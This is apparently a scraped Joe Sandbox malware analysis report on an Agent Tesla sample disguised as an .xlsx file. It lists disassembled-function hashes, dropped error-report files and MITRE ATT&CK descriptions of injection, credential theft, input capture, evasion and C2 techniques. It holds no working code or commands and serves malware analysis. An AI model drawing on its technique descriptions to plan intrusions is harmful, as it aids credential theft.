Snapshot File: hcaresult_2_2_6910000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-3623093008
Opcode ID: ef6f163658b8c70da4de7594d0ee09e09178366daac9e1a328c04ddc8c0c6bcf
Instruction ID: e8bec8bf556dd32192f37922b77c2e24f0fefc48d56b550fde2a93fa8391d5b5
Opcode Fuzzy Hash: ef6f163658b8c70da4de7594d0ee09e09178366daac9e1a328c04ddc8c0c6bcf
Instruction Fuzzy Hash: AA120B70E0121A8FDB64DFA5C954AAEB7B6BF88301F308569D40AAF755DB309D85CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0691A938 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$dq, xrefs: 0691AA95
$dq, xrefs: 0691AAC0
$dq, xrefs: 0691AA3A
$dq, xrefs: 0691AAB4
$dq, xrefs: 0691AAF6
$dq, xrefs: 0691AAEA
$dq, xrefs: 0691AA2E
$dq, xrefs: 0691AA89

Memory Dump Source

Source File: 00000002.00000002.2891727001.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6910000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-634254105
Opcode ID: a2be235d06e044a5c2bf332170fbc2a4821e0b348d71f509abd4f3c0716e2ae6
Instruction ID: dda5cec3b135c6976ab17f6224d3898ef084a97301968885068456cf21546615
Opcode Fuzzy Hash: a2be235d06e044a5c2bf332170fbc2a4821e0b348d71f509abd4f3c0716e2ae6
Instruction Fuzzy Hash: B6918C70A0220DDFEB65DF64D954BAEBBB7BF84311F308529E8059B694DB349D41CB80

Uniqueness

Uniqueness Score: -1.00%

Function 06917098 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$dq, xrefs: 069173E0
.5|q, xrefs: 069170F3
$dq, xrefs: 069175AC
$dq, xrefs: 069175A0
$dq, xrefs: 06917534
$dq, xrefs: 0691737A
$dq, xrefs: 069173D4

Memory Dump Source

Source File: 00000002.00000002.2891727001.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6910000_AddInProcess32.jbxd

Similarity

API ID:
String ID: .5|q$$dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-3447281907
Opcode ID: c0538d6d0d052ba9128419099c04b3faac2f61a165cebaa36deb23cc214c6949
Instruction ID: aa77deca534a45334f367ed49bf401c5f747cc8b795b10df71618a5a60d090d5
Opcode Fuzzy Hash: c0538d6d0d052ba9128419099c04b3faac2f61a165cebaa36deb23cc214c6949
Instruction Fuzzy Hash: DAF13B70A0120ECFDB55EFA8D954A6EB7B7BF88341F248529D4059F798CB31AC42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 069183D0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$dq, xrefs: 06918636
$dq, xrefs: 0691862A
$dq, xrefs: 0691869B
$dq, xrefs: 0691868F

Memory Dump Source

Source File: 00000002.00000002.2891727001.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6910000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq
API String ID: 0-185584874
Opcode ID: 1980694a6fe0c56ba97bb17f0621b701ccbbcae7807ad2262e3ef99f90543cfd
Instruction ID: af7980c95bc977dc96f834907c096947b1817d12a4514f13e6c5e64171f73d01
Opcode Fuzzy Hash: 1980694a6fe0c56ba97bb17f0621b701ccbbcae7807ad2262e3ef99f90543cfd
Instruction Fuzzy Hash: DDB12A70B112198FDB55EF68CA9466EB7B6FF84301F348829D4059B794DB34DC86DB80

Uniqueness

Uniqueness Score: -1.00%

Function 0691ACC0 Relevance: 5.2, Strings: 4, Instructions: 178COMMON

Download Yara Rule

Strings

$dq, xrefs: 0691AE9C
$dq, xrefs: 0691AE73
$dq, xrefs: 0691AE44
$dq, xrefs: 0691ADF1

Memory Dump Source

Source File: 00000002.00000002.2891727001.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6910000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq
API String ID: 0-185584874
Opcode ID: b7f3c396ececebfd817f7818ec99df31d9e7489d51350cf0b6daf4945cbb2ef7
Instruction ID: a7efc54d9e0fadb75f3765bffb51f91f73df08ec5cd3a7e3da3aade34ae2722d
Opcode Fuzzy Hash: b7f3c396ececebfd817f7818ec99df31d9e7489d51350cf0b6daf4945cbb2ef7
Instruction Fuzzy Hash: 1C51AD34A122089FDF66DB68E9906AEB7B6EF84311F34892AD805DF654DB309D41CB80

Uniqueness

Uniqueness Score: -1.00%

Function 069187E8 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$dq, xrefs: 06918867
LRdq, xrefs: 069188DB
$dq, xrefs: 06918873
LRdq, xrefs: 0691892A

Memory Dump Source

Source File: 00000002.00000002.2891727001.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6910000_AddInProcess32.jbxd

Similarity

API ID:
String ID: LRdq$LRdq$$dq$$dq
API String ID: 0-340319088
Opcode ID: 089b245fe327ee672c6f39b51c1bde74a55e58db4bd04e96aab7083e4fa03f2c
Instruction ID: 46ae2346c95a44471b11f31a09195f26dc481f6033e2e433a510494ae525960c
Opcode Fuzzy Hash: 089b245fe327ee672c6f39b51c1bde74a55e58db4bd04e96aab7083e4fa03f2c
Instruction Fuzzy Hash: CC518030B002099FDB58EF68DA54A7A77E6FF85300F248969E4159F7A9DA30EC41CB91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report M_F+niestandardowy stempel.xlsx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_M_F+niestandardo_fb838ddbb7a53927da742c4ca68b8bbcd9a1_fcd16283_fd1c0569-ded8-4609-a847-49845e6beddc\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA9A1.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAAFA.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB39.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
M_F+niestandardowy stempel.xlsx.exe

Function 00007FFD9B891DD8 Relevance: 8.5, Strings: 2, Instructions: 6003
COMMON

Function 00007FFD9B89EBF8 Relevance: 2.0, Strings: 1, Instructions: 727
COMMON

Function 00007FFD9B8A1D88 Relevance: 1.7, Strings: 1, Instructions: 471
COMMON

Function 00007FFD9B8AC3AD Relevance: 1.6, Instructions: 1579
COMMON

Function 00007FFD9B89FCB0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 269
libraryCOMMON

Function 00007FFD9B98026B Relevance: 2.3, Strings: 1, Instructions: 1050
COMMON

Function 00007FFD9B8A02B4 Relevance: 1.6, APIs: 1, Instructions: 129
memoryCOMMON

Function 00007FFD9B8908BD Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre